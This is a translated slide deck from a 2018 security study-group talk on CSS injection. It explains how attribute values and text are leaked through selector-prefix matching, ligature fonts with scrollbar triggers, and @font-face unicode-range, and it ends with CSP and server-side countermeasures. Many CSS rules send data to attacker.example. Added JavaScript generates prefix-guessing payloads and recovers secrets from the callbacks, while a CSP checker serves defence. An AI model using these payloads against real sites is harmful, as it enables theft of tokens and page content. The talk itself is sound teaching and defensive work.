
CSS Injection ++ - An Overview of Existing Techniques and Countermeasures (original title: CSS Injection ++ - 既存手法の概観と対策)

Slides prepared for a short talk on the threats of CSS Injection and their countermeasures at the 19th meeting of the "Introduction to Security from Scratch" (ゼロから始めるセキュリティ入門) study group :-)
Study group page: https://weeyble-security.connpass.com/event/98127/

I explain some CSS Injection techniques by @masatokinugawa, @SecurityMB, and other websec researchers in Japanese. I highly recommend checking the following awesome work by @SecurityMB and @0x6D6172696F.
- https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/
- https://www.slideshare.net/x00mario/stealing-the-pie

Takashi Yoneuchi

August 27, 2018
Transcript

  1. Takashi Yoneuchi

    ja: @lmt_swallow , en: @y0n3uchy
    https://shift-js.info
    Image credit: "File:CSS3 logo and wordmark.svg." Wikimedia Commons, the free media repository, 28 Feb 2018, 03:50 UTC; accessed 25 Aug 2018, 05:09 UTC. https://commons.wikimedia.org/w/index.php?title=File:CSS3_logo_and_wordmark.svg&oldid=289484916
    CSS Injection ++

    An Overview of Existing Techniques and Countermeasures

  2. © 2018 shift-js.info All Rights Reserved.
    @lmt_swallow
    ‣ Takashi Yoneuchi
      aka @y0n3uchy
    ‣ dodododo CTF Team
      TSG
    ‣ SECCON Beginners
      ctf4b
      seccamp staff
    ‣ Web Security Researcher
      Wannabe
    ‣ https://shift-js.info

  3. What is CSS Injection?

  4. CSS Injection ++: An Overview of CSS Injection-Related Techniques and Countermeasures
    CSS Injection

    Vulnerability overview
    ‣ "CSS injection vulnerabilities arise when an application imports a style sheet from a user-supplied URL, or embeds user input in CSS blocks without adequate escaping."

    (PortSwigger, https://portswigger.net/kb/issues/00501300_css-injection-reflected)

    ‣ A vulnerability that lets an attacker make the application import an arbitrary CSS file, or insert CSS without escaping.

  5. Threats

    The threats of CSS Injection
    ‣ "Isn't it just that some CSS can be inserted?"
    ‣ The answer is NO: it is a fully viable attack.
    ‣ The threats of CSS Injection can be classified as follows:
      ‣ Extraction of page content via CSS
        ‣ Attribute extraction
        ‣ Extraction of content inside tags
      ‣ (JavaScript execution from CSS (outdated))

  6. Even if it seems "invisible" ...?

    Even if it looks invisible, in fact...
    ‣ In fact, even tags such as <script> can have their style adjusted
    ‣ So they too become targets of CSS Injection

    <head>
    <style>
    script { display: block; }
    </style>
    </head>
    <body>
    <script> var secret = "hello";

  7. An Overview of Existing Techniques

  8. JS Execution from CSS

    JS execution from CSS
    ‣ In the past, several techniques existed that turned CSS into JS (or some other scripting language) execution.
      ‣ Examples using .htc files with behavior:
      ‣ Examples using expression:
      (both were Internet Explorer-only features)
    ‣ In modern browsers this is (as far as I know) no longer achievable.

  9. Steal Values of Attributes

    Leaking attribute values: the principle
    ‣ Consider an HTML tag whose value attribute starts with "abc", e.g. <input value="abc">:

    ‣ It matches all three of the following CSS selectors:

    input[value ^= "a"] { /* ... */ }

    input[value ^= "ab"] { /* ... */ }

    input[value ^= "abc"] { /* ... */ }

    ‣ Applying this, attribute values can be leaked.

  10. Steal Values of Attributes

    Leaking attribute values: the big picture
    input[value ^= "a"] {
      background: url(http://attacker.example/?a)
    } /* ... */

    [Diagram: attack vector, request, leak; shown for the reflected and the stored variant]

  11. Steal Values of Attributes

    Leaking attribute values: concrete method (1)
    ‣ Suppose we want to extract the value of an <input> tag like the one above:
    ‣ Craft CSS like the following for every letter a-z and inject it:

    input[value ^= "a"] {
      background: url(http://attacker.example/?a)
    }

    ‣ If you are listening at attacker.example, one of GET /?a through GET /?z arrives (here, GET /?a).
    ‣ The first character ("a") has been leaked.

  12. Steal Values of Attributes

    Leaking attribute values: concrete method (2)
    ‣ Next, prepare CSS like the following:
    ‣ Inject it the same way and listen at attacker.example; the second character ("b") leaks as well. Repeat for the remaining characters.

    input[value ^= "aa"] {
      background: url(http://attacker.example/?aa)
    }

    /* ... */

    input[value ^= "az"] {
      background: url(http://attacker.example/?az)
    }
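The a-z rounds of slides 9 to 12, written out as an added example that is not part of the original deck: a generator for the per-round payload and the attacker-side loop that extends the known prefix from each callback. attacker.example and the `?prefix` query come from the slides; the target value, the alphabet and the simulated browser below are constructed for this demo (a real run would wait for the collector's HTTP requests instead of calling the simulator).

```javascript
// Added example, not from the deck. Node.js, no dependencies.
// Callback endpoint from the slides; the matched prefix travels in the query string.
const COLLECTOR = 'http://attacker.example/?';

// Quote a string for use as a CSS attribute-selector value. Inside a
// double-quoted CSS string only `"` and `\` need a backslash escape.
function cssString(s) {
  return '"' + s.replace(/["\\]/g, (c) => '\\' + c) + '"';
}

// One round of the attack: for every candidate next character c, a rule that
// matches if the attribute value starts with prefix + c. At most one rule can
// match, and its background-image URL reports which one it was. The URL is
// quoted so that characters such as ( ) ' in the guess cannot break url().
function buildRound(prefix, alphabet, collector = COLLECTOR) {
  return Array.from(alphabet, (c) => {
    const guess = prefix + c;
    const callback = collector + encodeURIComponent(guess);
    return `input[value^=${cssString(guess)}] { background: url("${callback}") }`;
  }).join('\n');
}

// Constructed stand-in for the victim's browser: evaluates `[value^="..."]`
// against a hidden input holding secretValue and returns the URLs it would fetch.
function simulateBrowser(secretValue) {
  return (css) => {
    const rule = /input\[value\^="((?:\\.|[^"\\])*)"\]\s*\{\s*background:\s*url\("([^"]*)"\)/g;
    const fetched = [];
    let m;
    while ((m = rule.exec(css)) !== null) {
      const needle = m[1].replace(/\\(.)/g, '$1'); // undo cssString escaping
      if (secretValue.startsWith(needle)) fetched.push(m[2]);
    }
    return fetched;
  };
}

// Attacker side: each callback carries the prefix that matched, so the next
// round just appends one more character. The loop ends when no rule fires,
// meaning the value is complete or its next character is outside the alphabet
// (the slides' a-z would miss digits, for instance); maxLen caps the rounds.
function recoverValue(oracle, alphabet, maxLen = 64) {
  let prefix = '';
  while (prefix.length < maxLen) {
    const callbacks = oracle(buildRound(prefix, alphabet));
    if (callbacks.length === 0) break;
    prefix = decodeURIComponent(new URL(callbacks[0]).search.slice(1));
  }
  return prefix;
}

if (typeof require !== 'undefined' && require.main === module) {
  const alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789';
  console.log(buildRound('ab', 'cd'));
  console.log('recovered:', recoverValue(simulateBrowser('s3cret'), alphabet));
}
```

Each round costs one injection and one page load by the victim, and the payload grows linearly with the alphabet, so in practice the alphabet is chosen from what the attribute is known to contain (hex for tokens, base64 characters, and so on).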

  13. Steal Inner Values of Tags

    Leaking values inside tags: overview
    ‣ The method so far can only leak "attribute values", the thing CSS selectors can reach (so text content is safe!)
    ‣ But values inside tags can be leaked too, by a different method. The key ingredients:
      ‣ Controlling "ligatures"
      ‣ Detecting them through scrollbar control
    ‣ @SecurityMB's article explains it well:

    https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/

  14. Steal Inner Values of Tags

    Leaking values inside tags: the big picture

    [Diagram: attack vector, request, leak; shown for the reflected and the stored variant]

  15. Steal Inner Values of Tags

    Leaking values inside tags: the big picture
    Attack vector = font control + scrollbar control
    ‣ Font control
      ‣ Tune the font so that a scrollbar appears only under a specific condition
    ‣ Scrollbar control
      ‣ Only when the scrollbar appears, make the browser send a request to the listening server

  16. Steal Inner Values of Tags

    Leaking values inside tags: concrete method (1)
    Font control
    f + i → fi (Times)
    ‣ Ligatures like the one above can be defined in a font.
    ‣ So prepare a font like the following and apply it to the tag whose data you want to leak:
      ‣ For a specific character sequence (e.g. abc), give the ligature glyph a very large advance width
      ‣ For every other character, give the glyph an advance width of 0

  17. Steal Inner Values of Tags

    Leaking values inside tags: concrete method (2)
    Scrollbar control
    ‣ First, disable line wrapping: white-space: nowrap;
    ‣ Thanks to the font control, a horizontal scrollbar appears only when the specific string is present.
    ‣ Then inject CSS like the following as well; the appearance of the scrollbar triggers a request to the listening server.
      (::-webkit-scrollbar is a WebKit/Blink-only pseudo-element, so this trigger works in Chrome and Safari but not in Firefox)

    body::-webkit-scrollbar:horizontal {
      background: url(http://attacker.example/leak);
    }

  18. Steal Inner Values of Tags

    Leaking values inside tags: concrete method (3)
    ‣ E.g., to leak the "abc" in "Hello, abc":
      ‣ Prepare a font in which only "Hello, a" (as a ligature) is wide and every other character has width 0
      ‣ Inject the font setup together with the scrollbar-control CSS, once per candidate font (one of them fires)
      ‣ Once the first character (= "a") has leaked, repeat the above
      ‣ i.e., prepare "Hello, ab", ..., "Hello, az", and so on
    Font control + scrollbar control

  19. Leak Candidates of Inner Values

    Narrowing down the characters inside a tag / learning their order
    ‣ With @font-face, the set of characters inside a tag can be narrowed down.
    ‣ Use unicode-range to point each Unicode code point at a separate font source.

    @font-face{ font-family:poc; unicode-range:U+0041;
      src: url(http://attacker.example/?A);}

    ‣ The attacker waits for the incoming requests.
    ‣ Reference: "Reading out text with CSS alone by abusing the unicode-range of @font-face" (original title: @font-faceのunicode-rangeを利用してCSSだけでテキストを読み出す)

    by @masatokinugawa, http://masatokinugawa.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html

  20. Leak Candidates of Inner Values

    Narrowing down the characters inside a tag / learning their order
    ‣ The previous technique tells you that a character appears, but not how many times or in what order → incomplete recovery.
    ‣ Order: by combining CSS animations, the font requests can be made to fire in the order in which each character first appears.
      ‣ "HarekazeCTF2018 Web250 : A custom css for the flag"

    by @KageShiron, http://blog.esora.xyz/HarekazeCTF2018-CSS#web250-jp

    ‣ Count: a technique that recovers this on top of the previous method is unknown to me (or does not exist?) (if you know one, please tell me!)
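The unicode-range probe of slides 19 and 20, as an added example that is not part of the original deck: a generator for the per-code-point @font-face rules and the collector-side step that reads the access log back into the set of characters present. attacker.example is the slide's callback host; the `?0041`-style query (hex code point, where the slide uses `?A`), the target text and the log lines are constructed for this demo. As slide 20 says, this yields presence only: the code recovers neither order nor counts.

```javascript
// Added example, not from the deck. Node.js, no dependencies.
const COLLECTOR = 'http://attacker.example/?';

// Zero-padded upper-case hex; used both in unicode-range and, by this demo's
// convention, in the callback query string.
const hex = (cp) => cp.toString(16).toUpperCase().padStart(4, '0');

// Probe sheet: one @font-face per code point, all under the same family name,
// plus a rule applying that family to the element holding the secret. A browser
// downloads a face only if its unicode-range intersects the text it actually
// renders with that family, so each font request leaks that the character occurs.
function buildUnicodeRangeProbe(codePoints, selector = 'body', collector = COLLECTOR) {
  const faces = codePoints.map(
    (cp) => `@font-face { font-family: poc; unicode-range: U+${hex(cp)}; src: url(${collector}${hex(cp)}); }`,
  );
  faces.push(`${selector} { font-family: poc; }`);
  return faces.join('\n');
}

// Inclusive range of code points, e.g. range(0x20, 0x7E) for printable ASCII.
function range(from, to) {
  return Array.from({ length: to - from + 1 }, (_, i) => from + i);
}

// Constructed stand-in for the victim's browser plus the collector's access log:
// one Apache-style log line per distinct code point of `text` that the probe
// covers. A face is fetched once however often its character occurs, which is
// why multiplicity is lost.
function simulateCollectorLog(text, codePoints) {
  const covered = new Set(codePoints);
  const seen = new Set();
  const lines = [];
  for (const ch of text) {
    const cp = ch.codePointAt(0);
    if (!covered.has(cp) || seen.has(cp)) continue;
    seen.add(cp);
    lines.push(`203.0.113.7 - - [27/Aug/2018:13:37:00 +0900] "GET /?${hex(cp)} HTTP/1.1" 404 0`);
  }
  return lines;
}

// Collector side: parse the log and return the characters that were present,
// sorted by code point. The arrival order of real requests is not reliable
// (fonts load in parallel), so the result is deliberately treated as a set.
function charsFromLog(logLines) {
  const found = new Set();
  for (const line of logLines) {
    const m = /"GET \/\?([0-9A-F]{4,6}) HTTP\//.exec(line);
    if (m) found.add(parseInt(m[1], 16));
  }
  return [...found].sort((a, b) => a - b).map((cp) => String.fromCodePoint(cp)).join('');
}

if (typeof require !== 'undefined' && require.main === module) {
  const printable = range(0x20, 0x7e);
  const log = simulateCollectorLog('flag{css}', printable);
  console.log(log.join('\n'));
  console.log('characters present:', JSON.stringify(charsFromLog(log)));
}
```

The 95 rules for printable ASCII are small enough to inject in one go; the output is the alphabet to feed into a positional technique such as the attribute-prefix or ligature rounds, which is what makes those later rounds cheap.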

  21. From the defender's perspective:

    Attack paths and countermeasures

  22. Where can it be exploited?
    Attack paths
    ‣ Relative Path Overwrite (RPO)
      ‣ Writeup: "RPO Gadgets"

    by @filedescriptor, https://blog.innerht.ml/rpo-gadgets/

    ‣ When a <style> tag itself can be inserted
      ‣ In that case <script> could probably be inserted too, but it may still be useful for bypassing a blacklist?
    ‣ When arbitrary strings can be inserted inside a <style> tag
    ‣ Places where users may configure arbitrary CSS

  23. Mitigations

    Countermeasures
    ‣ Client-side countermeasure: Content-Security-Policy
      ‣ All the attack techniques presented here can be restricted with the style-src directive of CSP.
      ‣ Caveat: style-src controls which stylesheets may load and whether inline styles apply; the callback requests themselves (background images, fonts) are governed by img-src and font-src, and a stylesheet reached through Relative Path Overwrite is a same-origin URL that style-src 'self' permits.
    ‣ Server-side countermeasure: restrict CSS insertion by users
      ‣ Any place where arbitrary CSS can be inserted, CSS Injection included, is a real security risk.
      ‣ Where Relative Path Overwrite is possible, even places that do not look injectable are at risk! Beware.
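A check for the CSP countermeasure on slide 23, as an added example that is not part of the original deck: parse a Content-Security-Policy header string, work out the effective style-src (falling back to default-src as browsers do), and report whether injected styles would still apply and whether the callback channels the earlier slides rely on (background images under img-src, @font-face loads under font-src) are left open. The policy strings in the usage block and tests are constructed.

```javascript
// Added example, not from the deck. Node.js, no dependencies.

// Parse "name src src; name src" into a Map of directive name -> source list.
// The first occurrence of a directive wins; browsers ignore later duplicates.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// Effective source list for a fetch directive: the directive itself, else
// default-src, else null meaning "unrestricted".
function effectiveSources(directives, name) {
  if (directives.has(name)) return directives.get(name);
  if (directives.has('default-src')) return directives.get('default-src');
  return null;
}

const lower = (s) => s.toLowerCase();

// Source expressions that let an attacker-controlled origin through.
function isWideOpen(sources) {
  return sources === null || sources.map(lower).some((s) => ['*', 'http:', 'https:', 'data:'].includes(s));
}

function reviewCspForCssInjection(header) {
  const d = parseCsp(header);
  const notes = [];
  let blocksInjectedStyles = true;

  const style = effectiveSources(d, 'style-src');
  if (style === null) {
    blocksInjectedStyles = false;
    notes.push('no style-src or default-src: inline <style> and any stylesheet URL are allowed');
  } else {
    const keywords = style.map(lower);
    const hasNonceOrHash = keywords.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
    // CSP Level 2+ browsers ignore 'unsafe-inline' once a nonce or hash is present.
    if (keywords.includes("'unsafe-inline'") && !hasNonceOrHash) {
      blocksInjectedStyles = false;
      notes.push("style-src allows 'unsafe-inline': an injected <style> block applies");
    }
    if (isWideOpen(style)) {
      blocksInjectedStyles = false;
      notes.push('style-src allows any origin: an attacker-hosted stylesheet can be imported');
    }
    if (keywords.includes("'self'")) {
      notes.push("style-src 'self' permits same-origin URLs, which is what a Relative Path Overwrite stylesheet is");
    }
  }

  // Exfiltration channels used by the techniques on the slides: background
  // images (img-src) and @font-face sources (font-src).
  const openExfilChannels = ['img-src', 'font-src'].filter((name) => isWideOpen(effectiveSources(d, name)));
  for (const name of openExfilChannels) {
    notes.push(`${name} is unrestricted: callback requests to an attacker host would be allowed`);
  }
  return { blocksInjectedStyles, openExfilChannels, notes };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(reviewCspForCssInjection("default-src 'self'; style-src 'self' 'unsafe-inline'; img-src *"));
  console.log(reviewCspForCssInjection("default-src 'none'; style-src 'nonce-r4nd0m'; img-src 'self'; font-src 'self'"));
}
```

The second policy in the usage block is the shape that actually stops the attacks on the slides: nonce-gated styles, and img-src and font-src pinned to 'self' so that a background image or font request cannot reach attacker.example even if a stylesheet did get in.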

  24. Thank you for listening :-)
    Any Questions?
    Takashi Yoneuchi
    ja: @lmt_swallow, en: @y0n3uchy
    https://shift-js.info